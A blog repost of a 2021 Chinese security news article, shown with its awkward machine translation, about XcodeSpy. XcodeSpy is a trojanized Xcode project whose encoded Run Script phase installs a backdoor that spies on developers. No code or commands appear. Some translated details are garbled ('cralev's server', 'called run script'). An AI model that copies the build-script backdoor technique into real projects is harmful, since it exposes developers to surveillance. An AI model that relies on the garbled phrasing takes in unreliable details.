Apple developers are on target! Xcode was attacked once again.

-

作者:卡罗尔

By Carol

CSDN(csdnnews)

CSDN (csdnnews)

最近,一些研究人员说他们在野外发现了一个木马代码基"xcodespy"。这是Xcode开发者的全新恶意软件。它使用编码平台的脚本功能在受影响的设备上安装后门。

Recently, some researchers said that they found a Trojan horse code base "xcodespy" in wild. This is a brand new malware for Xcode developers. It uses the script function of the coding platform to install backdoors on the affected devices.

开发者使用Xcode在iPhone、iPad、MAC等设备上创建应用程序,恶意软件就会感染MacOS上的Xcode集成开发环境(IDE)。

Developers use Xcode to create applications on iPhone, iPad, MAC and other devices, and then malware will infect Xcode integrated development environment (IDE) on MacOS.

以脚本的形式启动并运行

In the form of script, start and run

Xcode是苹果公司为编写IOS和其他苹果操作系统应用程序的开发者提供的免费开发工具。它使得开发者可以根据用户的交互情况轻松制作IOS标签条的动画。它是存储应用程序所需的所有文件、资源和信息的仓库。

Xcode is a free development tool provided by apple for developers who write applications for IOS and other Apple operating systems. It makes it easy for developers to make animation of IOS tag bar according to user interaction. It is a warehouse for storing all files, resources and information needed by applications.

据安全专家称,攻击者利用IDE中的run script函数感染使用Xcode项目的苹果开发者。此外,一些研究人员还发现,黑客篡改了GitHub上基于合法项目的恶意版本(原项目主要为IOS开发者提供IOS tab bar的高级动画功能),然后用所谓的"木马化Xcode项目"感染苹果开发者。

According to security experts, attackers are using the run script function in IDE to infect Apple developers using Xcode projects. In addition, some researchers have found that hackers have tampered with a malicious version based on a legitimate project on GitHub (the original project mainly provides IOS developers with advanced animation features of IOS tab bar), and then infected Apple developers with the so-called "trojanized Xcode project".

此恶意版本称为"运行脚本"。脚本将在开发人员构建的版本启动时执行。它将自动下载并安装带有持久化机制的定制变种蛋壳后门,并通过用户的麦克风、摄像头和键盘对用户进行监控。

This malicious version is called "run script". The script will be executed when the version built by the developer starts. It will automatically download and install the customized variant of eggshell backdoor with persistence mechanism, and monitor the user through the user's microphone, camera and keyboard.

这很容易混淆,系统很难捕获

It is easy to confuse and the system is difficult to capture

这种攻击依赖于Xcode中的run script函数。由于此函数允许开发人员在启动应用程序实例时运行自定义shell脚本,因此会造成混淆,因为控制台或调试器中没有执行恶意版本的迹象。

This kind of attack relies on the run script function in Xcode. Because this function allows developers to run a custom shell script when starting an application instance, it is confused because there is no sign that the malicious version has been executed in the console or debugger.

有经验的开发人员应该意识到在使用第三方Xcode项目之前检查恶意脚本的重要性。然而,尽管检测脚本并不困难,xcodespy的攻击也试图通过编码脚本来增加检测的难度。

Experienced developers should be aware of the importance of checking for malicious scripts before using third-party Xcode projects. However, although it is not difficult to detect scripts, xcodespy's attack also attempts to increase the difficulty of detection by encoding scripts.

如上图所示,当开发人员对其进行解码时,很明显脚本会联系到cralev的服务器,然后通过服务器内置的反向shell发送神秘的命令"mdbcmd"。

As shown in the figure above, when the developer decodes it, it is obvious that the script contacts cralev's server, and then sends the mysterious command "mdbcmd" through the built-in reverse shell of the server.

目前,IOS tab bar项目"tabbar interaction"的原始版本尚未被篡改,可以从GitHub安全下载。

At present, the original version of IOS tab bar project "tabbar interaction" has not been tampered with and can be safely downloaded from GitHub.

Link:https://new.qq.com/omn/20210319/20210319A0ADX700.html

update time:2021-03-19 18:54:23

Comments

Post a Comment

Popular posts from this blog

Microblog, the drummer of out of control rice circle

-
Image
六年前的北京,在年底的那一天,有烟雾和冷空气。人们聚集在CBD的中国酒店门口,等待一群网络名人出现。这一天,微博V影响力峰会在这里举行。 Six years ago in Beijing, on the day at the end of the year, there was smog and cold air. People gathered at the door of the China Hotel in the CBD, waiting for a group of online celebrities to appear. On this day, the microblog V influence summit was held here. 有趣的流行博客"记忆小背心"是蹲着的对象之一。他从未露面。在他确认参加峰会的消息公布后,一些粉丝在微博上大喊"现场寻找雕像"。颇受他欢迎的是另一个大V"微博搞笑排行榜",拥有2000多万粉丝。如果你使用当前流行的词汇,它就是一个合适的"热门词汇"。 Funny popular bloggers "small vest for memory" is one of the objects squatted. He has never shown his face. After the news that he confirmed his participation in the summit came out, some fans shouted on the microblog to "look for the statue" on the spot. Quite popular with him is another big V "microblog funny ranking", with more than 20 million fans. If you apply the current popular words, it is a proper "top stream". 垂直领域的净人气是当时微博的王牌。 The net popularity in...
Read more

The up owner of station B outside the spotlight: a "endless marathon"

-
Image
近日,B站赛区up业主"摩卡官"在其住所去世的消息再次引起up业主群体的关注。 Recently, the news that the up owner "Mocha official" in the game area of station B passed away in his residence has made the up owner group concerned again. 自2020年2月起,《摩卡官网》开始在B台投稿和直播,共有28部视频作品,其中大部分是现场游戏的片段。截至今年1月,粉丝还不到200人。根据这些账号信息,"摩卡官网"属于"极底层"游戏区。 Since February 2020, "Mocha official" has started to contribute and live broadcast in station B, with a total of 28 video works, most of which are clips of live game. As of January this year, the number of fans was less than 200. According to these account information, "Mocha official" belongs to the "very bottom" game area. 根据官方数据,2019年,B站up创作者将超过460万,而且这个数字还在不断增长。同时,最新财报显示,B站在用UPS数量已达170万台。 According to official data, in 2019, there will be more than 4.6 million up creators in station B, and this number is growing. At the same time, the latest financial report shows that the number of active UPS in station B has reached 1.7 mil...
Read more